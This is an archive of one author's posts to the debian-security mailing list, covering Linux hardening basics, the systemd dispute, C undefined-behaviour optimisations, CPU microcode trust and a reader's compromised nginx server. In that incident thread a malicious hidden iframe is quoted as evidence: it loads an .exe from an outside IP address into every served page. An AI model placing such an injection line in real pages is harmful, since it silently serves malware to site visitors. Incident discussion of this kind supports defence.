features for Linux. Some of the items in the list are meaningful, some
are not. Most might be if you know what you are doing with them. None
of the meaningful items in that list are unavailable on Debian, and
the defaults are reasonably secure in Debian.

 So, I'm very happy with Debian but because my friend seems to be an expert 
 for Linux, I don't know if I can use Debian. Can you tell me which of the 
 security features promoted by Ubuntu are also enabled in Debian?


Security is not a package you can buy or download. Whether you choose
Ubuntu or Debian, if you are concerned about security, you need to
spend time learning about it The partly out-of-date pages that Riku
gave you links to are a good place to start.

The first question I would ask (but don't answer me, of course) is how
good your passwords are. This will be an issue with any OS you choose,
even seriously secure OSses like openBSD.

Your passwords should be at least ten characters, preferably twelve or
more, include alphabet and numbers and one or two punctuation marks.
One I used to use was something like MIro$0fT5t!NKs. But don't use
that, of course. (When I realized that too many people know my
prejudices, I decided I shouldn't use it.)

The next question is whether you allow root login. (Again, don't
answer me, on or off list. Just check yourself.) If you allow root
login at all, use an extra strong password for root. You probably do
not want to allow root login from the network, but you may want to
allow root login from the console.

Changing the port sshd listens to is also a good idea.

Do not surf the web as root or as any administrator login id, of course.

Speaking of admin login ids, it's a good idea to have one non-root
login id that you only use for administrative tasks. And you should
avoid getting onto the web when logged in with the admin id. Which
means you need another id for general use, which makes two strong
passwords, three if you allow root login.

If you have a habit of downloading random apps from the internet,
unlearn that habit. Use your package manager instead, and think twice
or more about the apps that you can't get through your package
manager.

(This is turning into another blog post, I think.)

Anyway, the basics of security are the same, whether you use Debian,
Ubuntu, Fedora, openBSD, whatever.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/caar43inlxo_dxsp_b+q1mxuunyefuynycej_mqw3bkrw+ys...@mail.gmail.com

Re: Four people decided the fate of debian with systemd. Bad faith likely

[Joel Rees]

On Sun, Mar 2, 2014 at 10:00 AM,  y...@marupa.net wrote:
 On Sunday, March 02, 2014 09:20:44 AM Joel Rees wrote:
 On Sun, Mar 2, 2014 at 8:43 AM,  y...@marupa.net wrote:
  On Sunday, March 02, 2014 12:00:41 AM Volker Birk wrote:
  On Sat, Mar 01, 2014 at 02:17:05PM -0800, Leslie S Satenstein wrote:
   I am a casual Debian user and a person who has 50 years in IT.   My
   first comment is that the direction that other Linux distributions are
   taking is not the system V direction.  I am not a Linux Internals
   person, but there are many who are.  The consensus is that systemd is
   better and the right approach for now and the future.  I realize that
   the author of this email to which I am responding is upset. But, what
   should be done? Do a fork of Debian and that fork remains with Sys V?
 
  There will be a split in Debian community for this decision for sure.
  The split goes through Linux community in total.
 
  Doesn't make the decision to drop SysV Init, a system even its own
  maintainer says is a pile of garbage, in favor of systemd, any less
  technically sound.
 flame away, flame away


 Call it a flame all you want,

It was a flame, and a flame empty of reason.

You provided a much more reasonable, if short-sighted, description of
your position in another post. You can do that. If you're going to
respond to the kind of post that started this thread, you should
respond with reason. Unless you really don't care for reason.

If you couldn't respond with reason, why bother responding?

  I for myself will switch to DragonFly BSD if possible. The problem is,
  that Linux today has the drivers. And because the political program of
  the systemd guys to conquer the whole Linux world is successful,
  everyone will be dependent on their APIs there in near future.
 
  Oh please, grow up.

 You grow up. Technically inferior stuff always seems to get the money,
 but you get to live in the results of your choices.

 Oh, how will I ever live with a faster boot, more reliable process control,
 unit files that are easier to write and maintain than initscripts, socket-
 activated daemons, concurrently-launched dependency-based service startup, the
 fact that I use Archlinux and it actually went FROM a BSD-style init TO
 systemd, a logger I can actually efficiently navigate with metadata, and a 
 more
 unified device and configuration infrastructure?

 Life is so horrible for me thanks to how easy systemd makes maintaining my
 system. I have seen the light!

 Conrad

Yeah, it works fine for you for now.

You will understand what I have said soon enough. shrug/

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iO+rHTDfbRHCKFAAjyaER78OhJY_-Z18SeKgy=3z+k...@mail.gmail.com

Re: Four people decided the fate of debian with systemd. Bad faith likely

[Joel Rees]

On Sun, Mar 2, 2014 at 8:43 AM,  y...@marupa.net wrote:
 On Sunday, March 02, 2014 12:00:41 AM Volker Birk wrote:
 On Sat, Mar 01, 2014 at 02:17:05PM -0800, Leslie S Satenstein wrote:
  I am a casual Debian user and a person who has 50 years in IT.   My
  first comment is that the direction that other Linux distributions are
  taking is not the system V direction.  I am not a Linux Internals
  person, but there are many who are.  The consensus is that systemd is
  better and the right approach for now and the future.  I realize that
  the author of this email to which I am responding is upset. But, what
  should be done? Do a fork of Debian and that fork remains with Sys V?

 There will be a split in Debian community for this decision for sure.
 The split goes through Linux community in total.


 Doesn't make the decision to drop SysV Init, a system even its own maintainer
 says is a pile of garbage, in favor of systemd, any less technically sound.

flame away, flame away

 I for myself will switch to DragonFly BSD if possible. The problem is,
 that Linux today has the drivers. And because the political program of
 the systemd guys to conquer the whole Linux world is successful,
 everyone will be dependent on their APIs there in near future.


 Oh please, grow up.

You grow up. Technically inferior stuff always seems to get the money,
but you get to live in the results of your choices.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
https://lists.debian.org/CAAr43iNquRx-Dbv0=061-6-kxw_d0Tcbc+fW1zwLgox-T=1...@mail.gmail.com

Re: MIT discovered issue with gcc

[Joel Rees]

On Sun, Dec 1, 2013 at 9:26 AM, Bernhard R. Link brl...@debian.org wrote:
 * Joel Rees joel.r...@gmail.com [131129 00:36]:
 The standard needs to be re-written to encourage sane behavior in
 undefined situations, and if you don't like that opinion, I'll take
 some time later, when I have some, to rip your arguments that I've
 clipped above to shreds. I don't mind if you don't.

 I think the only answer to those lines is to advise you to not use
 any programs written in C.

Heh, heh, heh

 I suggest writing everything in Haskell
 and compiling that to java byte code run in a jvm. With the jvm
 implemented in Haskell and running in an interpreter.

touche
(Where is the unicode palette when you want an accented e?)

 Bernhard R. Link
 --
 F8AC 04D5 0B9B 064B 3383  C3DA AFFC 96D1 151D FFDC

I went back and started digging into the threads Mark posted way back
up there, and the grad student (I think it was) at MIT is just really
taking things way out of context.

So is most of the thread, including my earlier reactions.

The compiler writers, including the team working on LLVM/Clang, are
fully aware that the appropriate behavior when a compiler optimizes
based on undefined behavior is to provide for issuing warnings.
Getting there is just a bigger step than they realized.

I need to take the time to add to the confusion with a blog post of my
own interpretation, I suppose. A lot of strange things got said,
mostly by people who don't seem to be directly involved in writing the
optimizing code.

(No, the standard theoretically allowing bats to fly out of
unpredicted places when undefined code is executed is not an
optimizer's excuse to silently kill undefined behavior code. The
standard does not say that, really. I'm not sure why people like to
(mis)quote that misinterpretation. And there does some to be some lack
of awareness that treating undefined behavior code the same as dead
code is a false inversion of logic. But the guys doing the
optimizations are mostly trying to avoid treating undefined behavior
code that way, really.)

But the point that a lot of C programmers, even experienced
programmers, don't really understand the languages they are using when
writing in C probably bears a bit more emphasizing.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAr43iNm4rbvNW1F6KM1-RU1Zq+=SFzwcMcXnbbA7Xb7X8=n...@mail.gmail.com

Re: MIT discovered issue with gcc

[Joel Rees]

 of
optimization.

 What about adding cppcheck warnings and gcc -Wall -pedantic be added to
 Lintian?

 Or what about changing debhelper to pass some -f flags by default?

I'm thinking the standards committee needs some fresh blood. It's well
past time for the standard to recognize the difference between
undefinable behavior and system dependent behavior, and to encourage
compiler writers to put warnings about system dependent behavior at a
higher priority than arbitrary optimizations.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAr43iN9vzx63g0vOdFLbtGq24St42-X=29q1u8zjgo2jpf...@mail.gmail.com

Re: MIT discovered issue with gcc

[Joel Rees]

On Fri, Nov 29, 2013 at 3:02 AM, Bernhard R. Link brl...@debian.org wrote:
 * Octavio Alvarez alvar...@alvarezp.ods.org [131127 21:28]:
 [...]
 As people want fast programs it makes sense in my eyes to say here:
 This modification has big advantages and only is a problem for programs
 already not supposed to work by the standard.

So, since people want fast cars, we should re-write our standards to
ignore safety because the driver did something stupid?

I'm against seatbelt laws, myself, how about you?

Once upon a time, the standard included words to the effect that
undefined behavior should at least remain sane for the implemented
run-time for some definition of sane.

That should part seems to have been thrown away in an effort to
compete for speed. And with whom are we competing so mindlessly?

The standard needs to be re-written to encourage sane behavior in
undefined situations, and if you don't like that opinion, I'll take
some time later, when I have some, to rip your arguments that I've
clipped above to shreds. I don't mind if you don't.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAr43iMk9sTXQhY=V+OFHA0iAftamOkGNw3Hqu81aisc=iq...@mail.gmail.com

Re: MIT discovered issue with gcc

[Joel Rees]

Deja gnu?

On Sat, Nov 23, 2013 at 10:34 AM, Andrew McGlashan
andrew.mcglas...@affinityvision.com.au wrote:
 Hi,

 The following link shows the issue in a nutshell:

 http://www.securitycurrent.com/en/research/ac_research/mot-researchers-uncover-security-flaws-in-c

 [it refers to the PDF that I mentioned]

 --
 Kind Regards
 AndrewM

I seem to remember discussing the strange optimizations that optimized
away range checks because the code that was being firewalled had to
be correct.

Ten years ago, it was engineers that understood pointers but didn't
understand logic. This time around, maybe it's a new generation of
sophomoric programmers, or maybe we have moles in our ranks.

The sky is not falling, but it sounds like I don't want to waste my
time with Clang yet. And I probably need to go make myself persona
non-grata again in some C language forums

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/caar43io_4l7+vil8vqzpzro+fdm1vhpphepomp88hiwbn+f...@mail.gmail.com

Re: MIT discovered issue with gcc

[Joel Rees]

[Not sure this really needs to be cc-ed to security@]

On Sun, Nov 24, 2013 at 12:09 AM, Robert Baron
robertbartlettba...@gmail.com wrote:
 Aren't many of the  constructs used as examples in the paper are commonly
 used in c programming.  For example it is very common to see a function that
 has a pointer as a parameter defined as:

 int func(void *ptr)
 {
 if(!ptr) return SOME_ERROR;
 /* rest of function*/
 return 1;
 }

 Isn't it interesting that their one example will potentially dereference the
 null pointer even before compiler optimizations (from the paper):

 struct tun_struct *tun=;
 struct sock *sk = tun-sk;
 if(*tun) return POLLERR;

 The check to see that tun is non-null should occur before use, as in - quite
 frankly it is useless to check after as tun cannot be the null pointer (the
 program hasn't crashed):

This one has been thrashed to death.

Yes, the standard (after considerable reworking overseen by certain
groups with an axe to grind) says that, not only is dereferencing
before testing evil (i.e., undefined), but even adding to a pointer
before testing it is evil.

Committees really should not be allowed to define language semantics.
Make suggestions, sure, but actually define them, no.


 struct tun_struct *tun=;
 if(*tun) return POLLERR;
 struct sock *sk = tun-sk;

Yes, this arrangement is less liable to induce error on the part of
the programmer.

The compiler should be immune to such issues of induced error,
especially if it is able to reliably optimize out theoretically
undefined code (which is seriously, seriously evil).

 I am under the impression that these problems are rather widely known among
 c programmers (perhaps not the kids fresh out of college).  But this is why
 teams need to have experienced people.

 Furthermore, it is very common to find code that works before optimization,
 and fails at certain optimization levels.  Recently, I was compiling a
 library that failed its own tests under the optimization level set in the
 makefile but passed its own test at a lower level of optimization.

Completely separate issue.

 PS: I liked their first example, as it appears to be problematic.

As I noted (too obliquely, perhaps?) the my comments why you
top-posted over, this is nothing at all new. The holy grail of
optimization has been known to induce undefined behavior in compiler
writers since way before B or even Algol.

The guys responsible for optimization sometimes forget that falsifying
an argument is not falsifying the conclusion, among other things.

 On Sat, Nov 23, 2013 at 8:17 AM, Joel Rees joel.r...@gmail.com wrote:

 Deja gnu?

 On Sat, Nov 23, 2013 at 10:34 AM, Andrew McGlashan
 andrew.mcglas...@affinityvision.com.au wrote:
  Hi,
 
  The following link shows the issue in a nutshell:
 
 
  http://www.securitycurrent.com/en/research/ac_research/mot-researchers-uncover-security-flaws-in-c
 
  [it refers to the PDF that I mentioned]
 
  --
  Kind Regards
  AndrewM

 I seem to remember discussing the strange optimizations that optimized
 away range checks because the code that was being firewalled had to
 be correct.

 Ten years ago, it was engineers that understood pointers but didn't
 understand logic. This time around, maybe it's a new generation of
 sophomoric programmers, or maybe we have moles in our ranks.

 The sky is not falling, but it sounds like I don't want to waste my
 time with Clang yet. And I probably need to go make myself persona
 non-grata again in some C language forums

 --
 Joel Rees

 Be careful where you see conspiracy.
 Look first in your own heart.

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAr43iMM1OuT_cxYADAophvNtT95VxP=bfj+-nosgp+7agf...@mail.gmail.com

Re: MIT discovered issue with gcc

[Joel Rees]

On Sun, Nov 24, 2013 at 12:18 AM, Robert Baron
robertbartlettba...@gmail.com wrote:
 Second question:

 Doesn't memcpy allow for overlapping memory, but strcpy does not?  Isn't
 this why memcpy is preferred over strcpy?
[...]

The reason memcpy() is preferred over strcpy() is the same as the
reason strncpy() is preferred over strcpy().

memcpy() is actually considered a no-no in some circles, and perhaps
correctly so.  (Especially in C++, where classes are supposed to
define their own copying, and it's almost always more optimal to
explicitly copy each member instead of calculating the size, mass
copying, and going back and overwriting the members that are subject
to issues like deep copy. Remember that memcpy() is able to copy an
odd number of bytes, so the size calculation contains a bit more than
is obvious to the programmer.)

-- 
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/caar43iof7wca3zugtzewvhddjzk98ava2oatgw_mavruoyz...@mail.gmail.com

Re: debian wheezy i386 nginx iframe rootkit

[Joel Rees]

On Thu, Sep 12, 2013 at 9:39 AM, E Frank Ball III fra...@efball.com wrote:
 On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote:
   On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III fra...@efball.com 
 wrote:
Last fall there was a debian 64-bit / nginx rootkit going around,
now I've been hit with what sounds similar but on 32-bit wheezy.
   
All files served by nginx have this line inserted at the top:
   
iframe src= http://122.226.137.123:/yixi.exe width=0 
 height=0/iframe
   
I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
difference.
   
No ismod line in /etc/rc.local
   
I haven't been able to find anything.  Googling doesn't show anything
similar for debian wheezy i386, only sqeeze 64-bit.
   
I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
the nginx-light from debian wheezy but it made no difference.

   Just out of curiosity, did you back up nginx and check it as well?
   --
   Joel Rees

 No, I just uninstalled nginx from dotdeb and installed from Debian.

I suppose you're wondering whether to regret that?

 The webpages are all static and remain unchanged, the nginx config files
 are OK.  The new line is added by some process I can't find.

No surprise in that. Malware is getting better at hiding itself these days.

 The lynx webrowser shows this as the first line of the webpages:

Local on the machine in question or external?

 IFRAME: http://122.226.137.123:/yixi.exe

 It also appears in downloads using wget.
 view source in firefox or chrome show nothing amiss.

 It only appears on IPv4, not IPv6.

Again, are the browsers local to the machine in question or accessing
from the network?

 I do not have php installed.

Good. I enjoyed programming php, but if you can't trust the engine,
it's hard to justify writing an app on it.

 The http header is completely different:

 curl -I shows this:
  HTTP/1.1 200 OK
  Content-Type: text/html; charset=en_US.UTF-8
  Content-Length: 3634

 When it should look more like this:
  HTTP/1.1 200 OK
  Server: nginx/1.4.2
  Date: Wed, 11 Sep 2013 23:39:48 GMT
  Content-Type: text/html; charset=en_US.UTF-8
  Content-Length: 3291
  Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT
  Connection: keep-alive
  Vary: Accept-Encoding
  ETag: 5101a7f4-cdb
  Accept-Ranges: bytes

Okay, so, if it isn't something on an external box hijacking the IP
address of the box in question, it's a local process or set of
processes hijacking port 80 and trying unsuccessfully to be a
pass-through proxy.

 I installed chkrootkit, rkhunter, unhide.rb and they found nothing.

E Frank Ball  fra...@efball.com

Well, installing those after the unknown software is in place kind of
makes it hard for them to do their jobs. Among other things, the
system file map and checksums are going to reflect the unknown state
rather than the known good state.

Of course, if you have a serious rootkit in place, it's going to
hijack your detection/removal tools as soon as it sees them, so those
tools are not 100% infallible under the best conditions.

How much time/resources can you afford to spend on trying to pin the
intrusion vector down?

Although, I'd hesitate to use the box for anything important, even
after a complete wipe/install, unless the BIOS can be safely restored
from a write-protected backup image. And I'd try to be careful enough
during the install that if the exploit were repeated, I'd notice
immediately and thus be able to pin the thing more closely.

Maybe build the server as a VM and take snapshots as you go. Or
rebuild it on a different machine, with the old server  reboot from a
live CD before each major step and use the tools on the live CD to
take the snapshots.

--
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAr43iM3=JZ3RFiFAgVi7_qnGh8tZD0NV3Z-1ktye5_jUb=k...@mail.gmail.com

Re: How secure is an installation with with no non-free packages?

[Joel Rees]

On Fri, Sep 13, 2013 at 8:42 AM, adrelanos adrela...@riseup.net wrote:
 adrelanos:
 How secure is a Debian installation packages installed only from main,
 none from contrib or non-free?

 It will lack for example the firmware-linux-nonfree package and the
 intel-microcode / amd-microcode package. At least the microcode one is
 security relevant? Are there any other packages which might be important
 to have installed for security reasons?

 I mean, how secure is it in comparison with those packages installed vs
 not having them installed?



 I apologize, I didn't want to start a discussion of Open Source vs
 closed source. (Feel free to have it, I am delighted to read your
 thoughts on it, but I'd be also happy about an answer to the question I
 meant to ask but failed to properly state.) Sorry for not asking clear
 in the first place.

 To rephrase my original question:

 How vulnerable is Debian installation without intel-microcode /
 amd-microcode package?

No one knows.

We can only guess. Our guess includes an assumption that Intel or AMD
would or would not deliberately sabotage their products at the
instigation of an organization like the Chinese/Taiwanese government
or the NSA or some similar equivalent or not-so-equivalent secret
organization.

Ken Thompson gave us the archetype response on this question when he
described a way to grandfather a backdoor password into (the libraries
used by) a C compiler such that it would not show in the source but
would be present in the object. I assume you have read his essay on
trusting trust?

(1) All we can say for sure is that anything that is open is
inherently more open than anything that is closed.

(2) Anything we didn't build ourselves may be deliberately sabotaged.

(3) Anything we do build ourselves will have accidental gaping holes.

(4) When we work with friends, we can do more than when we work alone.

None of that tells us how bad Intel and AMD are screwing up, and which
directions they are running with the ball in the hardware camp. They
are primarily concerned with features that sell or otherwise obviously
make them money. Until sometime in the future (closer now than a year
ago), security does not sell, does not obviously make them money.

rant-mode
That's the short-sightedness of capital based economy when
interest-holders are not well-versed in the technological details of a
company's products or of the impact that product has in the market and
where it gets used. I hate to bring up the G-word again, but we humans
work beyond the edge of our abilities, we end up depending on someone
being more than human. And we refuse to accept the limitations of
working within our abilities, just like we refuse to believe we are as
limited as we are. Fortunately, G?? (or the universe) seems to have
given us room to make mistakes in this way, up to a point. Our next
big mistake is to hope that the natural consequences (or punishments
of G??) will never catch up to us.
/rant-mode

 Are there other contrib and/or non-free packages, similar to the
 microcode package, which make the system vulnerable, if not installed?

Depends on what you're using the system for.

Wish I could say more, but we are really just barely beginning to
scratch the surface of building a stable computer technology. And the
big boys are all about intellectual property right now, and as long as
they are playing those games, we aren't going to get any further on
what you need to be able to answer that question, essentially a
database of function vs. package vs. target use, and the interplay
thereof.

--
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAr43iN-ieCCU0jQvW6Hi9qcKTbKTBnn7=shtvx89vfxseq...@mail.gmail.com

Re: How secure is an installation with with no non-free packages?

[Joel Rees]

I am not Debian, but I am in rant-mode on this subject today, so bear with me --

On Fri, Sep 13, 2013 at 10:02 AM, adrelanos adrela...@riseup.net wrote:
 Jose Luis Rivas:
 So no, there's no other contrib/non-free packages there.

 I didn't want to imply, that there are preinstalled.

 The reason why you can't install Debian directly from a WiFi with some
 manufacturers is precisely that we do not ship non-free nor contrib
 software by default in our Debian installation different to what does
 other distributions like Ubuntu (no offense meant).

 And this is fine and I don't want to go into that political vs
 convenience discussion either.

You can't avoid it now. (Thanks to NSA and Intel deciding to boogie
together. Let the children boogie.)

 So we have the (intel/amd)-microcode and the firmware-linux-nonfree
 package which should be installed to improve security? Are there any
 other packages of this type?

We'd like to say they are unique.

They are unique in that they are the CPU, but any binary blob required
by the hardware you are using is going to have the same set of
problems, and most of them, even when we move the drivers out of the
kernel, are going to have the capability of subverting the whole box.

We'd like to say that it's all Intel's fault for pushing the market so
far so fast, but we can only say they have been a major contributor to
the problem. (We have, also, each one of us.)

 What would you do if there was an exploit in the wild, which uses an
 vulnerability in (intel/amd)?

Do you mean, in the cpu itself, or in the microcode?

 Let's say any website could prepare some
 html code which would trigger a remote code execution.

Ergo, on vulnerable CPU/microcode combinations.

 One that can only
 be fixed by having the (intel/amd)-microcode package installed.

So you're thinking the CPU, but which level of microcode?

 Is this a possible scenario?

Of course. Especially now that the bad guys have tools that allow
them to build targeted tools fairly easily.

 What would you (Debian) do in this case?

Do you mean, would Debian fold up and go away if the only way to
provide a secure OS were to be to include certain non-free packages by
default?

They already do (as Jose Luis Riva indicated). It just requires a
certain amount of action on your part so that they can limit the
amount of non-free stuff you have to load.

At the very least, AMD machines do not need Intel microcode, and
vice-versa. That's why it's important to have more than one major CPU
vendor, even if Intel's bragging that they have beaten everyone else
on all technical fronts had any merits whatsoever. (It doesn't. They
haven't even come close. Their current excesses are catching up to
them now.)

 (I am not suggesting anything here, I am just interested in those
 questions.)

And I suppose I am not contributing anything meaningful to the
conversation. Sorry, but this is a pet peeve of mine. We can't afford
the results when microprocessors become this complex, and one of the
reasons I hate Intel is that they have pushed the complexity so hard
to maintain their market advantage, and it just makes a mess of the
industry.

--
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAr43iMfQByPp=+O+2B0Y1JLA7Ynwu7EkvcxLygPud_3FP=c...@mail.gmail.com

Re: How secure is an installation with with no non-free packages?

[Joel Rees]

On Fri, Sep 13, 2013 at 10:11 AM, adrelanos adrela...@riseup.net wrote:
 [...]
 Yes, the more I dig into one topic, the open questions remain and them
 stronger the conclusion we're totally screwed becomes.

We've always been screwed. I'd say, ever since the 6809 faded away,
but what I'd mean is ever since we moved from 8-bit to 32-bit systems.
But, no, the problem is not the increased complexity, it's pushing the
industry into a range of complexity where we have no tools to deal
with the complexity.

Don't let it turn you paranoid or cynical, just learn what you can,
deal with it as you can, and keep doing what you can.

And don't hope there is a magic bullet.

With Intel, it's like our star pitcher has been caught trying to throw
the game.

I could use a war metaphor instead, but the point is not to give up.
It's to adjust our ideas about whom we can trust and start adjusting
our behavior accordingly.

And build tools to help us contain the damage. I'm not sure what we
can do concerning the microcode. The tools we need will require going
against Intel's shrink-wrap agreements, but I think we can claim
unconscionable clauses and such. Probing the microcode and breaking
the key for the update mechanism are high-priority. It's a Pandora's
box, but the NSA has forced our hand.

If the ARM consortium won't help us out here, by avoiding the stupid
excesses Intel has gone to, we'll eventually have to develop several
industrially viable fully open/libre/free CPU cores. (Several, for
specialized target applications, and so that we can avoid the
monoculture issues.)

--
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/CAAr43iMaZQ639ftb0cPmTd3Rv11Vd2-G=F4uu+POqFT6O=i...@mail.gmail.com

Re: debian wheezy i386 nginx iframe rootkit

[Joel Rees]

On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III fra...@efball.com wrote:
 Last fall there was a debian 64-bit / nginx rootkit going around,
 now I've been hit with what sounds similar but on 32-bit wheezy.

 Here's a link to info on the previous 64-bit rootkit:
 https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections


 All files served by nginx have this line inserted at the top:

 iframe src= http://122.226.137.123:/yixi.exe width=0 height=0/iframe

 Whatever it was isn't there anymore:
  Connecting to 122.226.137.123:... failed: Connection refused.

 I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
 Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
 difference.

 No ismod line in /etc/rc.local

 I haven't been able to find anything.  Googling doesn't show anything
 similar for debian wheezy i386, only sqeeze 64-bit.

 I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
 the nginx-light from debian wheezy but it made no difference.

 This machine was built on July 19th.  I've uninstalled nginx. I'll hold
 off rebuilding for now, maybe somebody here has some ideas?

E Frank Ball  fra...@efball.com

Just out of curiosity, did you back up nginx and check it as well?


--
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: 
http://lists.debian.org/caar43iojy_q8kuu47y+ah+v0e81vtnwykh2f6lvvcowqans...@mail.gmail.com

Re: Microcode update conundrum (was Re: ANNOUNCEMENT: Intel processor microcode security update)

[Joel Rees]

(Thanks for obliging, Henrik. ;-)

On Sun, Sep 8, 2013 at 5:34 PM, Henrik Ahlgren pa...@seestieto.com wrote:
 On Sun, Sep 08, 2013 at 08:00:12AM +0900, Joel Rees wrote:
 (1) This requires enabling two repositories that I have been avoiding
 enabling, contrib and non-free. That means I have to watch the
 repository more carefully when using

 apt-cache search

 or synaptic to look for new tools, right? Or can we just enable those
 two repositories long enough to load Henrique's tool and the microcode
 updates, then disable them again?

 Why do you feel that you even need to ask? You are free to handle the
 situation with your machines in any way you wish. Perhaps just
 download and install the .deb packages directly without even using
 apt, or simply ignore the microcode update as shipped by Debian or as
 BIOS upgrades by your computer manufacturer.

I'm thinking like a newbie. (Relative to debian, I am. :-/)

I know there is a tendency to send newbs to Ubuntu. I don't think
that's a good idea any more, for reasons you may not agree with, but I
am sure you are aware of. I am subconsciously thinking about starting
a new re-mix of debian that will focus on people who just want to
replace MSWindows and MacOSX.whatever with something that doesn't try
to own them, but don't have them time/confidence to learn how to do a
manual install of a .deb package.

And as long as Intel is so not-forthcoming, there is no point in doing
so for x86/amd64 CPUs.

 (2) Are there any CPU manufacturers who are not plagued by this
 ultimate refusal to let computer owners actually own their computers?

 At least Intel openly admits that their modern CPUs have the ability
 to change the microcode by uploading an encrypted binary blob. This
 universal backdoor is publicly documented[1].

You mean, the existence and location are publicly documented, but nothing else.

 Other manufacturers may
 claim otherwise, but what else can we do except trust them? It is a
 very fundamental problem.

And at least the mob admits they want to influence you.

Ken Thompson pointed out the problems inherent in trusting machines as
complex as computers. He also made some mis-targeted assertions about
culpability that are very relevant. He did not provide a solution.

We know the solution, but we don't want to admit that Stallman was
right. We don't think we know where to go from where he takes us.

(Why is decentralization so hard to understand?)

 Also, it is hard to argue that it is useful to have the ability to fix
 bugs in the CPU without replacing the chip.

I think you mean, hard to argue with the usefulness?

But, you see, I'm arguing that complex CPUs are evil. Somewhere in my
arguments is the idea that you could produce a CPU simple enough that
field upgrades would be unnecessary.

 After all, you will face
 the same dilemma of trusting the CPU manufacturer when offered a new
 revision of the physical CPU with bugfixes.

Actually, the dilemma goes back farther than that. How can you trust
the CPU manufacturer when

(1) you can't see the masks and you couldn't read them if you could,
(2) you can't see the manufacturing processes and you wouldn't know
where to look if you could,
(3) no single engineer can understand a modern CPU (and you probably
aren't one of the group that could get close),
(4) etc.

That's more than two lemmas. Darn.

 It simply is not feasible
 for the majority of people to reverse engineer the silicon for any
 evil features like NSA backdoors in any hardware crypto features.

And that's another set of problems.

 Does anyone know if the microcode shipped by Intel is always
 encrypted?

Jack provided a link. (And Henrique brought it into this thread.)

 Their nasty licence prohibits everse engineering,
 decompilation, or disassembly of the blob, but even if you ignored
 that,

(See said link, and kudos to someone for going that far down the road.)

 or even if you had the source code (whatever that means in the
 context of microcode, it is not normal X86 code after all), could you
 make any sense of it without having the whole silicon design
 available?

Microcode source code is only a little harder to read than ordinary
machine code. Sometimes it's easier. It's machine code, after all,
even if it isn't the machine code the user usually works with. The
problem is access to the machine that executes the microcode.

Gate arrays and such are not programmed with a machine language, per
se, and are significantly harder to reverse engineer.

But if Intel publicly documented the gate arrays and microcoded
machines used in their CPUs, the updates would not be beyond the reach
of some engineers not employed by Intel. Provision of the gate array
definitions and the microprogramming would add eyeballs to the job of
finding bugs, as well. That leaves the manufacturing processes opaque,
but even those would be more subject to probing if Intel were more
forthcoming.

 [1] 
 http://www.intel.com/content/www/us/en/architecture

Re: Microcode update conundrum (was Re: ANNOUNCEMENT: Intel processor microcode security update)

[Joel Rees]

